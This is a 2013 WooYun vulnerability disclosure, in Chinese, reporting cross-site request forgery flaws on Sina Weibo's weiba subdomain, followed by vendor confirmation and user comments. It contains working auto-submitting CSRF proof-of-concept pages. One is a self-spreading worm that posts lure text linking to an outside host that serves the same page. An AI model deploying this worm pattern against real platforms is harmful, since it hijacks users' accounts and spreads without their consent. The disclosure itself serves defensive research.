当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-017694

漏洞标题:新浪微博首页再来一波蠕虫

相关厂商:新浪微博

漏洞作者: 风萧萧

提交时间:2013-01-22 20:42

修复时间:2013-03-08 20:42

公开时间:2013-03-08 20:42

漏洞类型:CSRF

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-01-22: 细节已通知厂商并且等待厂商处理中
2013-01-22: 厂商已经确认,细节仅向厂商公开
2013-02-01: 细节向核心白帽子及相关领域专家公开
2013-02-11: 细节向普通白帽子公开
2013-02-21: 细节向实习白帽子公开
2013-03-08: 细节向公众公开

简要描述:

金龙大锅,我又来了

详细说明:

1.出问题的是这个地方撒!

http://weiba.weibo.com

1.jpg


2.这个站点几乎没有对CSRF做任何防范,不过加关注刷粉丝的地方除外啊!举两个例子如下:
3.首先是支持微博吧的地方,对于微博吧的支持没有防范CSRF,导致可以刷微博吧粉丝,不是刷个人粉丝的地方撒:

2.jpg


构造POC如下:

<html>
<body>
<form id="fxx" name="fxx" action="http://weiba.weibo.com/aj_baropen/support" method="POST">
<input type="text" name="abid" value="23093" />
<input type="submit" value="submit" />
</form>
<script>
	document.fxx.submit();
</script>
</body>
</html>

漏洞证明:

4.点击上图【支持一下】后,会有如下转发到微博的请求发出!

3.jpg


5.点击【发布】,抓包查看请求如下:

http://weiba.weibo.com/aj_baropen/share?__rnd=1358845029390
POST /aj_baropen/share?__rnd=1358845029390 HTTP/1.1
Host: weiba.weibo.com
Proxy-Connection: keep-alive
Content-Length: 555
Origin: http://weiba.weibo.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://weiba.weibo.com/bar/open/27872?from=repba
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: 略
text=#开通微吧#我刚刚投给了 “耽美吧” 1票,支持量达到3000 “耽美吧” 就能开通了,亲!给力支持一下吧~点此投票:http://weiba.weibo.com/bar/open/27872?from=repba&from=0&pid=a753ecd1jw1dzxuipd4hrj&_t=0


6.POST请求的几个参数都好理解,text参数是转发到微博的内容,from参数表示是来自哪里,但是pid参数不能确认,不知道是token还是什么一个指定的id,不过我去掉了是没有关系的。
7.构造如下POC页面:

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
</head>
<body>
<form id="fxx" name="fxx" action="http://weiba.weibo.com/aj_baropen/share" method="POST">
<input type="text" name="text" id="content" value="test" />
<input type="text" name="from" value="0" />
<input type="text" name="pid" value="a753ecd1jw1dzxuipd4hrj" />
<input type="submit" value="submit" />
</form>
<script>
	var random=new Array();
	random[0]="";
	random[1]="有帅哥哦";
	random[2]="有萝莉哦";
	random[3]="有小清新哦";
	random[4]="有女王哦";
	random[5]="有御姐哦";
	random[6]="有高帅富哦";
	random[7]="有女屌丝哦";
	random[8]="有美女哦";
	random[9]="有苍老师哦";
	var num =parseInt(Math.random()*10);
	var constr="   follow me! http://xssed.me/csrf/weibo.html";
	var sendstr=random[num]+constr;
	alert(sendstr);
	document.getElementById("content").setAttribute("value",sendstr);
	document.fxx.submit();
</script>
</body>
</html>


8.本地chrome浏览器运行,查看返回结果以及微博首页转发情况:

4.jpg


5.jpg


9.IE浏览器登录另一个微博账号,查找到刚才发表的微博,点击链接,同样也发表了一篇微博:

6.jpg

修复方案:

金龙大锅要言而有信哦!

版权声明:转载请注明来源 风萧萧@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2013-01-22 23:24

厂商回复:

感谢关注新浪安全。

最新状态:

暂无

漏洞评价:

评论

  1. 2013-01-22 21:13 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    目测洞主发现微博金矿了

  2. 2013-01-22 21:33 | se55i0n ( 普通白帽子 | Rank:1567 漏洞数:173 )

    @xsser 哈哈,洞主这下有刷不完的rank,收不完的礼物咯,,

  3. 2013-01-22 21:33 | 0ps ( 实习白帽子 | Rank:43 漏洞数:10 | xo)

    要火啊

  4. 2013-01-22 21:35 | 风萧萧 认证白帽子 ( 核心白帽子 | Rank:1020 漏洞数:76 | 人这一辈子总要动真格的爱上什么人)

    @xsser 客官刷粉丝吗?

  5. 2013-01-22 21:44 | 小胖胖要减肥 认证白帽子 ( 普通白帽子 | Rank:686 漏洞数:101 )

    @风萧萧 看上去还是同一个问题

  6. 2013-01-22 21:50 | redrain有节操 ( 普通白帽子 | Rank:183 漏洞数:26 | ztz这下子有165了!>_<'/&\)

    少侠,10元1000粉

  7. 2013-01-22 22:21 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    洞主答应给我的粉丝呢?求粉丝,新浪微博id:px1624

  8. 2013-03-09 07:29 | 苏南同学 ( 实习白帽子 | Rank:41 漏洞数:5 | 苏南同学,就是苏南同学~~~)

    这个poc页面是放那里的?是不是蠕虫的那个地址是个外站地址,然后外站地址页面里面放哪个poc表单的?

  9. 2013-03-09 07:38 | 风萧萧 认证白帽子 ( 核心白帽子 | Rank:1020 漏洞数:76 | 人这一辈子总要动真格的爱上什么人)

    这么早了还不睡?

  10. 2013-03-09 07:46 | 苏南同学 ( 实习白帽子 | Rank:41 漏洞数:5 | 苏南同学,就是苏南同学~~~)

    @风萧萧 无钱无妹子,睡啥啊

  11. 2013-03-10 11:11 | Seraph ( 路人 | Rank:23 漏洞数:6 | 没有死,不等于活着!)

    大神